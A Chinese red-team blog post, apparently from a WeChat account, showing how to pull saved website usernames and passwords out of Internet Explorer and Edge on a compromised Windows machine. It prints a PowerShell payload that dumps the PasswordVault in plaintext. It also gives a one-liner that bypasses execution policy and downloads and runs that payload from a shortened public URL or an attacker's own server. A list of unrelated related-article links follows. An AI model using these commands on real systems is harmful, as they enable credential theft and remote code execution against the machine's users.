浏览器获取设备信息_一条命令获取 IE 浏览器保存网站的账号和密码信息
渗透攻击红队
一个专注于红队攻击的公众号
大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
Powershell
内网渗透一直以来都是一个热门话题,试想在一个大型的内网环境下,当我们拿到了内网windows机器后,我们该如何通过他们去获取更多的所需资源,这就需要我们进行内网渗透了。然而在内网渗透中,除了kali、metasploit等高能的存在以外,还有一款神器也常常容易遭到忽略----PowerShell
Powershell 获取 IE 浏览器的账户密码信息
Powershell
首先需要的是一段 Powershell Payload:
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = New-Object Windows.Security.Credentials.PasswordVault$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password
我们可以把他放到公网上,这里有老外现成的了:http://bit.ly/2K75g15
如果你不想用它的域名,你也可以把 Powershell Payload 放到你自己的公网服务器上,然后使用 Powershell 调用它即可:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"
这个时候就能获取到你 IE 浏览器中的缓存信息,查找你保存的账户和密码信息。
参考文章:
https://github.com/HanseSecure/credgrap_ie_edge
渗透攻击红队
一个专注于渗透红队攻击的公众号
点分享点点赞点在看
浏览器获取设备信息_一条命令获取 IE 浏览器保存网站的账号和密码信息相关推荐
- bat脚本中获取上级目录_批处理bat命令--获取当前盘符和当前目录和上级目录
批处理命令获取当前盘符和当前目录 %~d0 是当前盘符 %cd% 是当前目录 可以用echo %cd%进行打印测试 以下例子是命令行编译Visual Studio编写的程序: @echo off se ...
- bat脚本中获取上级目录_批处理bat命令 获取当前盘符和当前目录和上级目录的代码...
批处理命令获取当前盘符和当前目录 当前盘符:%~d0 当前路径:%cd% 当前执行命令行:%0 当前bat文件路径:%~dp0 当前bat文件短路径:%~sdp0 测试 echo 当前盘符:%~d0 ...
- 系统无ifconfig,一条命令获取本机ip并将其赋值给指定变量来使用
在Linux系统中,准确地获取本机IP信息是非常有用的.在写bash shell脚本事经常会用到IP,这时就需要我们使用一些办法获取本机IP并赋值给变量来使用.最近刚刚完成grep及sed的摸索.研究 ...
- android获取设备的唯一编号,android如何获取设备的唯一设备码
在某些项目中,需要记录用户的某些设置,或行为,并上传到服务器,如果无需用户登录注册,就可记录独立这些内容,就需要用到设备的某些独立的序列.(以下部分android需要API8以以上,android2. ...
- 360 浏览器设置里安全设置里清除上网痕迹中没有“管理保存过的账号和密码”这个选项
360浏览器设置里安全设置里清除上网痕迹中没有"管理保存过的账号和密码"这个选项 点击360浏览器右上角"管理"->"管理"里的&qu ...
- 计算机管理里面的用户名是否可以导出,360浏览器管理保存过的账号和密码步骤教程...
许多360浏览器的用户在注册网站账号的时候,都会被360浏览器提醒安全保存该账号和密码,一般用户也会选择安全保存.但是,如果一个网站注册了多个账号,或者当时360浏览器管理保存过的账号和密码是错误的或 ...
- 用计算机获取信息,学会用CMD命令获取计算机的所有信息,菜鸟头衔马上崩塌
提到windows操作系统,相信大家一点都不陌生,它以96.2%的市场份额,在全世界稳居操作系统榜首.其中,仅仅windows 10就已经占领了半壁江山.就连早在2001年发布的windows xp, ...
- adb查看手机cpu使用率_通过 adb 命令获取手机应用性能数据 (CPU、内存、流量)
由于工作需要获取安卓手机游戏应用运行时的性能数据,上网学习了一些知识,整理记录下... 若有错误,欢迎指正:若有更好方法,感谢分享. 1. 获取CPU数据 命令:adb shell top -n -1 ...
- 为什么python不能输入中文_一条命令解决mac版本python IDLE不能输入中文问题
安装完Python通常自动就有了一个简易的集成环境IDLE,但在mac上,无法在IDLE中使用中文. 通常故障有两种情况: 1.在IDLE中,中文输入法根本无法工作,不会弹出输入框,所有的输入都被当做 ...
最新文章
- jmeter聚个报告怎么看qps_Jmeter查看QPS和响应时间随着时间的变化曲线
- 创立创造创建的区别_【干货|知识分享】Solidworks与Rhino有什么区别呢?
- BZOJ2244 [SDOI2011]拦截导弹 【cdq分治 + 树状数组】
- 物联网平台构架系列 (四):Amazon, Microsoft, IBM IoT 解决方案导论 之 平台
- c++ 整数取反_c++ 取反运算符“~”
- 牛客网 【每日一题】7月27日题目精讲—乌龟棋
- 面试之 Python 进阶
- php多文件上传存储到表,PHP 实现一种多文件上传的方法
- alsa的动态库安装在哪里_linux 给运行程序指定动态库路径
- 【翻译】在Sencha Touch中创建离线/在线代理
- 干货!3 个重要因素,带你看透 AI 技术架构方案的可行性
- Atitit 概念:数据、信息、知识 目录 1. 艾提拉提出的 信息金字塔 数据 信息 知识 智慧	1 1.1. 洞见级别金字塔 数据 信息 知识	2 1.2. 数据 信息 知识韦恩图	3 1
- PID控制算法的c语言实现 附录2 直流电机PWM调速系统中控制电压非线性研究
- mime 类型列表_MIME类型的完整列表
- 机组0:为什么补码比原码多一个-128清晰解释
- 如何在国外进行自然科学研究
- 360极速浏览器插件不见了
- 国内各银行间异地汇款手续费对照表
- cv曲线面积的意义_南昌大学陈义旺、武汉大学闵杰《AFM》:大面积有机太阳能电池中一种减少非辐射复合损耗的有效方法...
- neo4j desktop下载及安装详解
热门文章
- 计算机专业英语教程计算机硬件翻译,计算机专业英语教程第5版翻译
- decimal 和 numeric (Transact-SQL)
- [JVM]35个java代码性能优化总结
- 计算机的硬件工作原理(图片部分资源摘自王道考研资料)
- 深入学习linux socket编程之select
- Ipython\Jupyter数据分析工具
- canny算法的实现(android加载图片,数组写入文件换行)
- sklearn、theano、TensorFlow 以及 theras 的理解
- 原 hibernate与mysql字段类型对应关系
- [密码学基础][每个信息安全博士生应该知道的52件事][Bristol Cryptography][第22篇]如何用蒙哥马利算法表示一个数字和多个相乘的数字